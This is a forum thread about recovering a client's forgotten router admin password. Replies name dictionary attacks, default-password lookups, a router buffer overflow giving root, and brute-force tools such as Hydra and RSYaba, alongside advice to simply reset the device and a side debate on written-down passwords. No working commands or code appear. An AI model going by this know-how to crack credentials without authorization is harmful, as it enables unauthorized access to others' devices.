Jump to content

Brute Force A Router


joeypesci

Recommended Posts

Is it possible to do a dictionary attack a router to get the admin password? Haven't got the details of the router yet but a client has had a stroke so can't remember the login details. They don't want to reset the router and just wondered if there was a way of brute forcing the password?

Before anyone comments. All above board and genuine.

Link to comment
Share on other sites

Is it possible to do a dictionary attack a router to get the admin password? Haven't got the details of the router yet but a client has had a stroke so can't remember the login details. They don't want to reset the router and just wondered if there was a way of brute forcing the password?

Before anyone comments. All above board and genuine.

Its most definitely possible on a consumer router since they usually don't have any mechanisms to ban you after too many attempts. Nearly every consumer based router only lets you change the password while keeping the same default user name from manufacturing the same (which is usually admin or root), so if you look up the default user name, if it even takes one, as some only require a single password entered with no user name, then it shouldn't be too hard to brute force it, just time consuming. If anything, its a waste of time to try brute forcing if you can just reset it. If anything, see if he even changed the default password and look up the model first: http://www.routerpasswords.com/

If it is a consumer router, just reset the damn thing. Takes you 5 minutes to reset everything to what he needs it to be, and you can then change the password and be done with it. I can't see any reson not to reset it unless it were for a corporate network, by which you would have to take it offline to reset anyway. If its on a corporate network, there isn't a reset button on high end Cisco equipment(or most other brands either) and you would need to put it in ROMmon mode via console/serial cable to reset the password anyway.

Link to comment
Share on other sites

It's what the client wants. No idea why, but they don't want to reset it. Might be the login details for the ISP maybe? I use to be with BT and luckily wrote mine down years ago, then reset the router and had to hunt round for the ISP login details :) I know they could call the ISP I guess. I don't know.

Anyway, thanks for the suggests.

Link to comment
Share on other sites

Depending on the version of the router some have buffer over flows that give you root access then you can just use passwd I know BT home hub white box had one.

Link to comment
Share on other sites

Hydra is quite good, for http brute forcing. Used it many times for pen-testing my network.

Now on a side note, make sure you have a very long dictionary file.

Link to comment
Share on other sites

It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P.

What I do with clients that always call me is setup remote admin, setup a DynDNS in the router to auto-update so i always have the IP, and away I go. They never need to know the password.

I also write down the admin password, and Wifi access passkey/phrase on a piece of paper, and tape it to the top/bottom of the router just so if I forget, they can tell me, and if they forget (Typically the wifi access passkey/phrase) they can just look at the paper taped to the router.

Link to comment
Share on other sites

It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P.

What I do with clients that always call me is setup remote admin, setup a DynDNS in the router to auto-update so i always have the IP, and away I go. They never need to know the password.

I also write down the admin password, and Wifi access passkey/phrase on a piece of paper, and tape it to the top/bottom of the router just so if I forget, they can tell me, and if they forget (Typically the wifi access passkey/phrase) they can just look at the paper taped to the router.

Doh! I can't tell you how many passwords I've found written on a stickynote placed on the bottom of the keyboard.

Link to comment
Share on other sites

Doh! I can't tell you how many passwords I've found written on a stickynote placed on the bottom of the keyboard.

I work for an IT company that, provides on site support for police and all the other GOV agencies. Anyway, I've seen worse they write all their passwords on a stickynote and place them on the monitor itself.

Ohh dude they must be really secure, no one will ever know what their password is "Sarcasm"

Link to comment
Share on other sites

Doh! I can't tell you how many passwords I've found written on a stickynote placed on the bottom of the keyboard.

That may be true, but i'm assuming this is a home user, not a business.

And if a home user has physical access or anyone for that matter to the router, why not have the password there, they could just as easily take the damn router...

Link to comment
Share on other sites

In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access then they can quite often do a lot more damage than steal the password.

Given the choice of a strong written down password or a weak one I'd go for the strong one as there are many more remote attackers than local one so better to defend against the masses than the minority.

Link to comment
Share on other sites

True, and like I said, I do that for the home computer illiterate. So if they don't remember the password, either I will or I can look at the paper on the router itself to not have to push the reset button.

That would be MOST helpful with dd-wrt flashed routers considering the reset button does not clear passwords.

Link to comment
Share on other sites

In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access then they can quite often do a lot more damage than steal the password.

Given the choice of a strong written down password or a weak one I'd go for the strong one as there are many more remote attackers than local one so better to defend against the masses than the minority.

The problem I have with written passwords laying about, and this is from where I used to work, is that vendors and outside techs who enter the building can plainly see passwords written on sticky notes attached to monitors as they pass by. Our Xerox techs would have to logon to the SUN stations attached to the printers (they had their own CE logins for maintenance), but they resided in the same rack as some of our other servers in the room we used for printing, which had passwords taped under the keyboards. Easily discoverable, and easily compromised by something as simple as a sticky note on the monitor or keyboard.

I know for a fact that there was a person whom I used to work with, who used someone else's password to access the internet via stolen password when they themselves were not aloud to access the internet. This password got shared with other people and was discovered when the employee left the company, their password was still in use before they had time to remove it. All because they stole the one other persons password, so the attacker isn't always someone who might be from the outside, it could be internal employee posing as another employee's credentials, and unless they get caught (which they did) you wouldn't be the wiser. In the case of the employee who stole the password, it not only gave them access to the internet proxy, but also to the users Novell login and shares on network tree, which if abused could have had disastrous results on the internal corporate network.

Link to comment
Share on other sites

Shameless plug, RSYaba http://www.digininja.org/projects/rsyaba.php

But I agree with Mr-P, unless you are really interested in playing with attack tools then just hit the reset button and reconfigure it.

I tried RSYaba on my site, and it worked a charm on my wordpress login. Granted I provided the username and password to use, but worked flawlessly once I figure dotu all the switches to add for password field and username field, cookies, etc.

Excellent tool and very easy to use. I see you have it set for http, https, mysql and ssh. How hard would it be to modify it for something like say, FTP, RDP, VNC, etc. Would these require additional GEMs alone, or would you need to also write something to speak to these other protocols on top of the GEMs for them?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...